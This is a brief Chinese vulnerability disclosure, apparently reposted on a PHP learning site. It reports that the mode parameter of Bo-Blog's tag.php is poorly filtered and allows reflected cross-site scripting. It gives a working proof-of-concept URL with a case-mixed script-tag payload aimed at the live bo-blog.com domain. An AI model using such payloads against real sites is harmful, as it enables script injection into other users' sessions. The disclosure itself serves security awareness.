tag.php中的mode变量过滤不严,导致xss http://www.bo-blog.com/weblog/tag.php?tag=%25E6%258F%2592%25E4%25BB%25B6&mode=1>"><ScRiPt>alert(/xss test/)</ScRiPt> www.2cto.com
查看更多关于bo-blog存在反射型XSS - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13556